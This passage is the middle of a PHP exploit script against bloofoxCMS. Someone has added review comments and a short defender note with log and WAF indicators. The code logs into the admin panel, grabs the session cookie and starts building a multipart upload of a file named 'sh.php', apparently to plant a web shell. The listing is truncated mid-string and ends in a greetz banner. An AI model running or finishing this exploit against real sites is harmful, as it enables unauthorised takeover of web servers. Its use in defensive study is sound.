\n"; print "\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n"; die(); }

// NOTE(review): this excerpt is cut at both ends. The line above is the tail of
// a usage/help block whose opening is not visible; it prints an example
// invocation and exits via die().

// Positional arguments: argv[1] is the host, argv[2] is the application path.
$host = $argv[1];
$path = $argv[2];

// Form body for the admin login. argv[3] and argv[4] are interpolated as-is
// (no URL-encoding is applied here).
$payload = "username={$argv[3]}&password={$argv[4]}&action=login";

// Hand-built HTTP/1.0 POST to {$path}admin/index.php with the form body above.
// The Referer value is host + path with no scheme prefix, and Content-Length is
// derived from the body length.
$packet = "POST {$path}admin/index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}admin/index.php\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";

// http_send() is not defined in this excerpt; presumably it sends $packet to
// $host and returns the raw response text. Confirm against its definition.
$response = http_send($host, $packet);

// Login is treated as successful only when the response contains a
// "Location: index.php" header (case-insensitive; the "." is an unescaped regex
// wildcard). Otherwise the script stops.
if (!preg_match("/Location: index.php/i", $response)) die("\n[-] Login failed!\n");

// Captures the first Set-Cookie value, up to the first ';', into $sid[1].
// The script stops if the response sets no cookie in that form.
if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");

print "\n..:: Login Successful ::..\n";
print "\n..:: Waiting hell ::..\n\n";

// Start of a multipart/form-data body: fixed boundary "o0oOo0o", one part for
// form field "filename" carrying a file named "sh.php" with content type
// application/octet-stream. The request that would carry this body is not in
// this excerpt.
// Defender note: the traffic built here is an authenticated POST to
// admin/index.php followed by a multipart part that names a .php file; the
// fixed boundary string and file name are usable as log/WAF indicators for this
// specific script. Whether the upload is accepted depends on the server-side
// handler, which is not shown. Extension allow-listing and a non-executable
// upload directory are the usual controls to verify.
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";

// NOTE(review): the listing is truncated from here on. The string opened on the
// next line is never closed in this excerpt, and the uploaded file's content
// plus the rest of the script are absent. What follows the quote looks like the
// page's footer banner, not program text. It is left untouched.
$payload .= " ################################################################################################################ # Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################